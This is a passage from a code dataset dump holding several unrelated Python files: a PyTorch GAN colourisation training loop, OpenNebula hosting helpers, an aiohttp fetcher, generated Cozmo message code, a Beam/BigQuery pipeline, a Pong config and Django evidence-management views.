64\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n return output\n\n \n \nnetG = Generator(ngpu).to(device)\nnetG.apply(weights_init)\nif opt.netG != '':\n netG.load_state_dict(torch.load(opt.netG))\nprint(netG)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, ngpu):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=True),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=True),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n\n return output.view(-1, 1).squeeze(1)\n\n\n\n\nnetD = Discriminator(ngpu).to(device)\nnetD.apply(weights_init)\nif opt.netD != '':\n netD.load_state_dict(torch.load(opt.netD))\nprint(netD)\n\n\ncriterion = nn.BCELoss()\n\n\nreal_label = 1\nfake_label = 0\n\n# setup optimizer\noptimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n\n\nfor epoch in range(opt.niter):\n for i, data in enumerate(dataloader, 0):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n \n # train with real\n netD.zero_grad()\n real_cpu = data[0].to(device)\n batch_size = real_cpu.size(0)\n label = torch.full((batch_size,), real_label, device=device)\n\n output = netD(real_cpu)\n errD_real = criterion(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n # train with fake\n# noise = torch.randn(batch_size, nz, 1, 1, device=device)\n# fake = netG(noise)\n # 1 means only chanle\n grey = torch.FloatTensor(batch_size,3,opt.imageSize,opt.imageSize).zero_()\n \n # Y' = 0.299 R + 0.587 G + 0.114 B \n grey[:,0,:,:] = real_cpu[0:batch_size,0,:,:]*0.299 + real_cpu[0:batch_size,1,:,:] * 0.587 + real_cpu[0:batch_size,2,:,:] * 0.114\n grey[:,1,:,:] = grey[:,0,:,:]\n grey[:,2,:,:] = grey[:,0,:,:]\n\n\n fake = netG(grey)\n \n \n label.fill_(fake_label)\n output = netD(fake.detach())\n errD_fake = criterion(output, label)\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n \n errD = errD_real + errD_fake\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n output = netD(fake)\n errG = criterion(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n print('[%d/%d][%d/%d] Loss_D: %.4f Loss_G: %.4f D(x): %.4f D(G(z)): %.4f / %.4f'\n % (epoch, opt.niter, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n \n# if i % 100 == 0:\n# vutils.save_image(real_cpu,\n# '%s/real_samples.png' % opt.outf,\n# normalize=True)\n# fake = netG(fixed_noise)\n# vutils.save_image(fake.detach(),\n# '%s/fake_samples_epoch_%03d.png' % (opt.outf, epoch),\n# normalize=True)\n\n # do checkpointing\n #torch.save(netG.state_dict(), '%s/netG_epoch_%d.pth' % (opt.outf, epoch))\n #torch.save(netD.state_dict(), '%s/netD_epoch_%d.pth' % (opt.outf, epoch))\n\n\n\n\n\n\n#plt.imshow(im0c)\n#plt.show()\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"498264788","text":"import logging\nfrom oca.pool import WrongIdError\n\nfrom hosting.models import UserHostingKey, VMDetail\nfrom opennebula_api.serializers import VirtualMachineSerializer\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_all_public_keys(customer):\n \"\"\"\n Returns all the public keys of the user\n :param customer: The customer whose public keys are needed\n :return: A list of public keys\n \"\"\"\n return UserHostingKey.objects.filter(user_id=customer.id).values_list(\n \"public_key\", flat=True)\n\n\ndef get_or_create_vm_detail(user, manager, vm_id):\n \"\"\"\n Returns VMDetail object related to given vm_id. Creates the object\n if it does not exist\n\n :param vm_id: The ID of the VM which should be greater than 0.\n :param user: The CustomUser object that owns this VM\n :param manager: The OpenNebulaManager object\n :return: The VMDetail object. None if vm_id is less than or equal to 0.\n Also, for the cases where the VMDetail does not exist and we can not\n fetch data about the VM from OpenNebula, the function returns None\n \"\"\"\n if vm_id <= 0:\n return None\n try:\n vm_detail_obj = VMDetail.objects.get(vm_id=vm_id)\n except VMDetail.DoesNotExist:\n try:\n vm_obj = manager.get_vm(vm_id)\n except (WrongIdError, ConnectionRefusedError) as e:\n logger.error(str(e))\n return None\n vm = VirtualMachineSerializer(vm_obj).data\n vm_detail_obj = VMDetail.objects.create(\n user=user, vm_id=vm_id, disk_size=vm['disk_size'],\n cores=vm['cores'], memory=vm['memory'],\n configuration=vm['configuration'], ipv4=vm['ipv4'],\n ipv6=vm['ipv6']\n )\n return vm_detail_obj\n\n\ndef get_vm_price(cpu, memory, disk_size):\n \"\"\"\n A helper function that computes price of a VM from given cpu, ram and\n ssd parameters\n\n :param cpu: Number of cores of the VM\n :param memory: RAM of the VM\n :param disk_size: Disk space of the VM\n :return: The price of the VM\n \"\"\"\n return (cpu * 5) + (memory * 2) + (disk_size * 0.6)\n","sub_path":"utils/hosting_utils.py","file_name":"hosting_utils.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"270077661","text":"from aiohttp import ClientSession, TCPConnector\nimport asyncio\n\n\ndef async_fetcher(urls, headers):\n async def fetch(url, session):\n async with session.get(url) as response:\n return await response.json()\n\n # async def bound_fetch(sem, url, session):\n # # Getter function with semaphore.\n # async with sem:\n # await fetch(url, session)\n\n async def run(urls, headers):\n # create instance of Semaphore\n # sem = asyncio.Semaphore(1000)\n tasks = []\n # Create client session that will ensure we dont open new connection\n # per each request.\n async with ClientSession(headers=headers) as session:\n for url in urls:\n # pass Semaphore and session to every GET request\n task = asyncio.ensure_future(fetch(url, session))\n tasks.append(task)\n\n responses = await asyncio.gather(*tasks)\n await session.close()\n return responses\n\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n future = asyncio.ensure_future(run(urls, headers))\n results = loop.run_until_complete(future)\n loop.close()\n\n return results","sub_path":"osiris/AsyncFetcher.py","file_name":"AsyncFetcher.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"579422920","text":"# Copyright (c) 2016 Anki, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License in the file LICENSE.txt or at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nAutogenerated python message buffer code.\nSource: clad/types/birthCertificate.clad\nFull command line: ../tools/message-buffers/emitters/Python_emitter.py -C ../robot/clad/src/ -o ../generated/cladPython// clad/types/birthCertificate.clad\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\ndef _modify_path():\n import inspect, os, sys\n search_paths = [\n '../..',\n '../../../../tools/message-buffers/support/python',\n ]\n currentpath = os.path.abspath(os.path.dirname(inspect.getfile(inspect.currentframe())))\n for search_path in search_paths:\n search_path = os.path.normpath(os.path.abspath(os.path.realpath(os.path.join(currentpath, search_path))))\n if search_path not in sys.path:\n sys.path.insert(0, search_path)\n_modify_path()\n\nimport msgbuffers\n\nAnki = msgbuffers.Namespace()\nAnki.Cozmo = msgbuffers.Namespace()\n\nclass BirthCertificate(object):\n \"Generated message-passing structure.\"\n\n __slots__ = (\n '_atFactory', # uint_8\n '_whichFactory', # uint_8\n '_whichLine', # uint_8\n '_model', # uint_8\n '_year', # uint_8\n '_month', # uint_8\n '_day', # uint_8\n '_hour', # uint_8\n '_minute', # uint_8\n '_second', # uint_8\n )\n\n @property\n def atFactory(self):\n \"uint_8 atFactory struct property.\"\n return self._atFactory\n\n @atFactory.setter\n def atFactory(self, value):\n self._atFactory = msgbuffers.validate_integer(\n 'BirthCertificate.atFactory', value, 0, 255)\n\n @property\n def whichFactory(self):\n \"uint_8 whichFactory struct property.\"\n return self._whichFactory\n\n @whichFactory.setter\n def whichFactory(self, value):\n self._whichFactory = msgbuffers.validate_integer(\n 'BirthCertificate.whichFactory', value, 0, 255)\n\n @property\n def whichLine(self):\n \"uint_8 whichLine struct property.\"\n return self._whichLine\n\n @whichLine.setter\n def whichLine(self, value):\n self._whichLine = msgbuffers.validate_integer(\n 'BirthCertificate.whichLine', value, 0, 255)\n\n @property\n def model(self):\n \"uint_8 model struct property.\"\n return self._model\n\n @model.setter\n def model(self, value):\n self._model = msgbuffers.validate_integer(\n 'BirthCertificate.model', value, 0, 255)\n\n @property\n def year(self):\n \"uint_8 year struct property.\"\n return self._year\n\n @year.setter\n def year(self, value):\n self._year = msgbuffers.validate_integer(\n 'BirthCertificate.year', value, 0, 255)\n\n @property\n def month(self):\n \"uint_8 month struct property.\"\n return self._month\n\n @month.setter\n def month(self, value):\n self._month = msgbuffers.validate_integer(\n 'BirthCertificate.month', value, 0, 255)\n\n @property\n def day(self):\n \"uint_8 day struct property.\"\n return self._day\n\n @day.setter\n def day(self, value):\n self._day = msgbuffers.validate_integer(\n 'BirthCertificate.day', value, 0, 255)\n\n @property\n def hour(self):\n \"uint_8 hour struct property.\"\n return self._hour\n\n @hour.setter\n def hour(self, value):\n self._hour = msgbuffers.validate_integer(\n 'BirthCertificate.hour', value, 0, 255)\n\n @property\n def minute(self):\n \"uint_8 minute struct property.\"\n return self._minute\n\n @minute.setter\n def minute(self, value):\n self._minute = msgbuffers.validate_integer(\n 'BirthCertificate.minute', value, 0, 255)\n\n @property\n def second(self):\n \"uint_8 second struct property.\"\n return self._second\n\n @second.setter\n def second(self, value):\n self._second = msgbuffers.validate_integer(\n 'BirthCertificate.second', value, 0, 255)\n\n def __init__(self, atFactory=0, whichFactory=1, whichLine=1, model=1, year=0, month=0, day=0, hour=0, minute=0, second=0):\n self.atFactory = atFactory\n self.whichFactory = whichFactory\n self.whichLine = whichLine\n self.model = model\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n @classmethod\n def unpack(cls, buffer):\n \"Reads a new BirthCertificate from the given buffer.\"\n reader = msgbuffers.BinaryReader(buffer)\n value = cls.unpack_from(reader)\n if reader.tell() != len(reader):\n raise msgbuffers.ReadError(\n ('BirthCertificate.unpack received a buffer of length {length}, ' +\n 'but only {position} bytes were read.').format(\n length=len(reader), position=reader.tell()))\n return value\n\n @classmethod\n def unpack_from(cls, reader):\n \"Reads a new BirthCertificate from the given BinaryReader.\"\n _atFactory = reader.read('B')\n _whichFactory = reader.read('B')\n _whichLine = reader.read('B')\n _model = reader.read('B')\n _year = reader.read('B')\n _month = reader.read('B')\n _day = reader.read('B')\n _hour = reader.read('B')\n _minute = reader.read('B')\n _second = reader.read('B')\n return cls(_atFactory, _whichFactory, _whichLine, _model, _year, _month, _day, _hour, _minute, _second)\n\n def pack(self):\n \"Writes the current BirthCertificate, returning bytes.\"\n writer = msgbuffers.BinaryWriter()\n self.pack_to(writer)\n return writer.dumps()\n\n def pack_to(self, writer):\n \"Writes the current BirthCertificate to the given BinaryWriter.\"\n writer.write(self._atFactory, 'B')\n writer.write(self._whichFactory, 'B')\n writer.write(self._whichLine, 'B')\n writer.write(self._model, 'B')\n writer.write(self._year, 'B')\n writer.write(self._month, 'B')\n writer.write(self._day, 'B')\n writer.write(self._hour, 'B')\n writer.write(self._minute, 'B')\n writer.write(self._second, 'B')\n\n def __eq__(self, other):\n if type(self) is type(other):\n return (self._atFactory == other._atFactory and\n self._whichFactory == other._whichFactory and\n self._whichLine == other._whichLine and\n self._model == other._model and\n self._year == other._year and\n self._month == other._month and\n self._day == other._day and\n self._hour == other._hour and\n self._minute == other._minute and\n self._second == other._second)\n else:\n return NotImplemented\n\n def __ne__(self, other):\n if type(self) is type(other):\n return not self.__eq__(other)\n else:\n return NotImplemented\n\n def __len__(self):\n return (msgbuffers.size(self._atFactory, 'B') +\n msgbuffers.size(self._whichFactory, 'B') +\n msgbuffers.size(self._whichLine, 'B') +\n msgbuffers.size(self._model, 'B') +\n msgbuffers.size(self._year, 'B') +\n msgbuffers.size(self._month, 'B') +\n msgbuffers.size(self._day, 'B') +\n msgbuffers.size(self._hour, 'B') +\n msgbuffers.size(self._minute, 'B') +\n msgbuffers.size(self._second, 'B'))\n\n def __str__(self):\n return '{type}(atFactory={atFactory}, whichFactory={whichFactory}, whichLine={whichLine}, model={model}, year={year}, month={month}, day={day}, hour={hour}, minute={minute}, second={second})'.format(\n type=type(self).__name__,\n atFactory=self._atFactory,\n whichFactory=self._whichFactory,\n whichLine=self._whichLine,\n model=self._model,\n year=self._year,\n month=self._month,\n day=self._day,\n hour=self._hour,\n minute=self._minute,\n second=self._second)\n\n def __repr__(self):\n return '{type}(atFactory={atFactory}, whichFactory={whichFactory}, whichLine={whichLine}, model={model}, year={year}, month={month}, day={day}, hour={hour}, minute={minute}, second={second})'.format(\n type=type(self).__name__,\n atFactory=repr(self._atFactory),\n whichFactory=repr(self._whichFactory),\n whichLine=repr(self._whichLine),\n model=repr(self._model),\n year=repr(self._year),\n month=repr(self._month),\n day=repr(self._day),\n hour=repr(self._hour),\n minute=repr(self._minute),\n second=repr(self._second))\n\nAnki.Cozmo.BirthCertificate = BirthCertificate\ndel BirthCertificate\n\n\n","sub_path":"rest_env/Lib/site-packages/cozmoclad/clad/types/birthCertificate.py","file_name":"birthCertificate.py","file_ext":"py","file_size_in_byte":8571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395897883","text":"import os, datetime, logging\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToText\n\nclass FormatCounty(beam.DoFn):\n def process(self, element):\n e = element # element is a dict\n \n # obtain the components of each element instance p\n country_region_code = e.get('country_region_code')\n country_region = e.get('country_region')\n sub_region_1 = e.get('sub_region_1')\n sub_region_2 = e.get('sub_region_2')\n date = e.get('date')\n retail_and_recreation_percent_change_from_baseline = e.get('retail_and_recreation_percent_change_from_baseline')\n grocery_and_pharmacy_percent_change_from_baseline = e.get('grocery_and_pharmacy_percent_change_from_baseline')\n parks_percent_change_from_baseline = e.get('parks_percent_change_from_baseline')\n transit_stations_percent_change_from_baseline = e.get('transit_stations_percent_change_from_baseline')\n workplaces_percent_change_from_baseline = e.get('workplaces_percent_change_from_baseline')\n residential_percent_change_from_baseline = e.get('residential_percent_change_from_baseline')\n #print(se) # check values of p\n\n # split sub_region2\n if sub_region_2 != None:\n if sub_region_2 != '':\n split = sub_region_2.split(' ')\n returnedString = ''\n foundCounty = False\n \n if split[-1].upper() == 'COUNTY':\n split = split[0:-1] #exclude county string\n foundCounty = True\n\n if foundCounty:\n for i in range(0,len(split)):\n if i == len(split) - 1:\n returnedString += split[i]\n else:\n returnedString += split[i] + ' '\n else:\n returnedString = sub_region_2\n else:\n returnedString = None\n else:\n returnedString = None\n # replace the county value with the modified county string (if the string had county in it)\n e['sub_region_2'] = returnedString\n \n # return new element\n return [e] \n \ndef run():\n PROJECT_ID = 'nimble-cortex-266516'\n BUCKET = 'gs://covid_19_cs327_extracredit-dataflow'\n DIR_PATH = BUCKET + '/output/' + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '/'\n\n # run pipeline on Dataflow \n options = {\n 'runner': 'DataflowRunner',\n 'job_name': 'formatcountry',\n 'project': PROJECT_ID,\n 'temp_location': BUCKET + '/temp',\n 'staging_location': BUCKET + '/staging',\n 'machine_type': 'n1-standard-4', # https://cloud.google.com/compute/docs/machine-types\n 'num_workers': 1\n }\n opts = beam.pipeline.PipelineOptions(flags=[], **options)\n\n p = beam.Pipeline('DataflowRunner', options=opts)\n\n sql = 'select * from covid_19_google_mobility_staging.mobility_report'\n bq_source = beam.io.BigQuerySource(query=sql, use_standard_sql=True)\n\n # format of pipeline transforms: '|' = apply, comment (what the transform does), '>>' = using, function\n query_results = p | 'Read from BigQuery' >> beam.io.Read(bq_source)\n \n # write input PCollection from sql query to log file (this was done by commenting out the ParDo, output, and writing into BQ transforms since the input.txt written was the same as output.txt)\n #query_results | 'Write input' >> WriteToText('google_input.txt')\n\n # apply ParDo to format the Coordinate transformation \n formatted_county_pcoll = query_results | 'Format County' >> beam.ParDo(FormatCounty())\n \n # write formatted District PCollection to log file\n #formatted_county_pcoll | 'Write formatted log' >> WriteToText('google_output.txt')\n\n dataset_id = 'covid_19_google_mobility_modeled'\n table_id = 'mobility_report_Beam_DF'\n schema_id = 'country_region_code:STRING,country_region:STRING,sub_region_1:STRING,sub_region_2:STRING,date:DATE,retail_and_recreation_percent_change_from_baseline:INTEGER,grocery_and_pharmacy_percent_change_from_baseline:INTEGER,parks_percent_change_from_baseline:INTEGER,transit_stations_percent_change_from_baseline:INTEGER,workplaces_percent_change_from_baseline:INTEGER,residential_percent_change_from_baseline:INTEGER'\n\n #write PCollection to new BQ table ! Problem resides here\n formatted_county_pcoll | 'Write BQ table' >> beam.io.WriteToBigQuery(dataset=dataset_id, \n table=table_id, \n schema=schema_id,\n project=PROJECT_ID,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n batch_size=int(100))\n \n result = p.run()\n result.wait_until_finish() \n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"covid_19_google_mobility_beam_dataflow.py","file_name":"covid_19_google_mobility_beam_dataflow.py","file_ext":"py","file_size_in_byte":4933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632587571","text":"scale = 8 # 1 for led screen, 6-ish for testing\r\nheight = 96*scale\r\nwidth = 80*scale \r\nscoreLimit = 3\r\n\r\n# Grove Socket Assignments\r\ngroveP1 = 0\r\ngroveP2 = 2\r\ngroveButton = 4\r\n\r\n# Change required in grove controls before enabling player control\r\ngrove_Threshold = 10\r\n\r\nmsg = \"PONG ON LED AS MADE BY AARON, DYLAN, JAKE, JONATHON AND JOSH!\"#All caps work a lot better\r\nmessageScroll = 0.1 #0.1 as default\r\ncolorBlue = 100,100,255\r\ncolorRed = 255,100,100\r\ncolorGreen = 100,255,100\r\ncolorGray = 100,100,100\r\ncolorText = 200,200,200","sub_path":"Pong/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167352691","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views.generic import TemplateView, CreateView, UpdateView, DeleteView\nfrom braces.views import LoginRequiredMixin, PermissionRequiredMixin\nfrom productos.models import Diplomado, Nivel, Sesion\nfrom formadores.models import Formador\nfrom evidencias.models import Evidencia\nfrom evidencias.forms import EvidenciaForm\nfrom productos.models import Entregable\nfrom evidencias.models import Red, Subsanacion\nfrom evidencias.forms import RedForm, RedRetroalimentacionForm\nfrom region.models import Region\nfrom django.shortcuts import HttpResponseRedirect\nfrom evidencias.tasks import build_red, carga_masiva_evidencias, retroalimentacion_red, build_red_producto_final\nfrom evidencias.models import CargaMasiva\nfrom evidencias.forms import CargaMasivaForm\nfrom matrices.models import Beneficiario\nfrom django.views.generic import FormView\nfrom evidencias.forms import SubsanacionEvidenciaForm\nfrom matrices.forms import BeneficiarioUpdateForm\nimport os\nfrom radicados.models import Radicado\nfrom evidencias.models import Rechazo\nfrom matrices.forms import PleBeneficiarioForm\nimport codecs\nfrom sican.settings import base as settings\nfrom django.core.files import File\nimport random\n\n# Create your views here.\n\nclass DiplomadosListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_diplomados.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n\nclass DiplomadosActividadesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_diplomados.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n\nclass FormadoresListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_formadores.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(FormadoresListView,self).get_context_data(**kwargs)\n\n\n\nclass ActividadesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_actividades.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(ActividadesListView,self).get_context_data(**kwargs)\n\n\n\nclass BeneficiariosEvidenciaListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/actividades/lista_beneficiarios.html'\n permission_required = \"permisos_sican.evidencias.codigos_evidencia.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_actividad'] = self.kwargs['id_evidencia']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_actividad'] = Entregable.objects.get(id = self.kwargs['id_evidencia']).nombre\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.codigos_evidencia.informes')\n return super(BeneficiariosEvidenciaListView,self).get_context_data(**kwargs)\n\n\n\nclass NivelesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_niveles.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['informes'] = self.request.user.has_perm('permisos_sican.evidencias.general.informes')\n return super(NivelesListView,self).get_context_data(**kwargs)\n\n\n\nclass SesionesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_sesiones.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n return super(SesionesListView,self).get_context_data(**kwargs)\n\n\nclass EntregablesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_entregables.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n return super(EntregablesListView,self).get_context_data(**kwargs)\n\n\n\nclass SoportesListView(LoginRequiredMixin,\n PermissionRequiredMixin,\n TemplateView):\n template_name = 'evidencias/general/lista_soportes.html'\n permission_required = \"permisos_sican.evidencias.general.ver\"\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(SoportesListView,self).get_context_data(**kwargs)\n\n\nclass NuevoSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n CreateView):\n model = Evidencia\n form_class = EvidenciaForm\n success_url = '../'\n template_name = 'evidencias/general/nuevo.html'\n permission_required = \"permisos_sican.evidencias.general.crear\"\n\n def get_initial(self):\n return {'id_formador':self.kwargs['id_formador'],'id_entregable':self.kwargs['id_entregable'],'id_usuario':self.request.user.id}\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(NuevoSoporteView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n cargados = self.object.beneficiarios_cargados.all()\n formador = Formador.objects.get(id = self.kwargs['id_formador'])\n entregable = Entregable.objects.get(id = self.kwargs['id_entregable'])\n evidencias = Evidencia.objects.filter(formador = formador,entregable = entregable).filter(beneficiarios_cargados__id__in = cargados.values_list('id',flat=True))\n\n for evidencia in evidencias:\n for cargado in cargados:\n evidencia.beneficiarios_cargados.remove(cargado)\n\n return super(NuevoSoporteView,self).form_valid(form)\n\n\nclass UpdateSoporteView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UpdateView):\n model = Evidencia\n form_class = EvidenciaForm\n success_url = '../../'\n pk_url_kwarg = 'id_soporte'\n template_name = 'evidencias/general/nuevo.html'\n permission_required = \"permisos_sican.evidencias.general.editar\"\n\n def get_initial(self):\n return {'id_formador':self.kwargs['id_formador'],'id_entregable':self.kwargs['id_entregable'],'id_usuario':self.request.user.id}\n\n def get_context_data(self, **kwargs):\n kwargs['id_diplomado'] = self.kwargs['id_diplomado']\n kwargs['id_nivel'] = self.kwargs['id_nivel']\n kwargs['id_sesion'] = self.kwargs['id_sesion']\n kwargs['nombre_diplomado'] = Diplomado.objects.get(id = self.kwargs['id_diplomado']).nombre\n kwargs['nombre_nivel'] = Nivel.objects.get(id = self.kwargs['id_nivel']).nombre\n kwargs['nombre_sesion'] = Sesion.objects.get(id = self.kwargs['id_sesion']).nombre\n kwargs['id_formador'] = self.kwargs['id_formador']\n kwargs['nombre_formador'] = Formador.objects.get(id = self.kwargs['id_formador']).get_full_name()\n kwargs['id_entregable'] = self.kwargs['id_entregable']\n kwargs['nuevo_permiso'] = self.request.user.has_perm('permisos_sican.evidencias.general.crear')\n return super(UpdateSoporteView,self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n self.object = form.save()\n\n cargados = 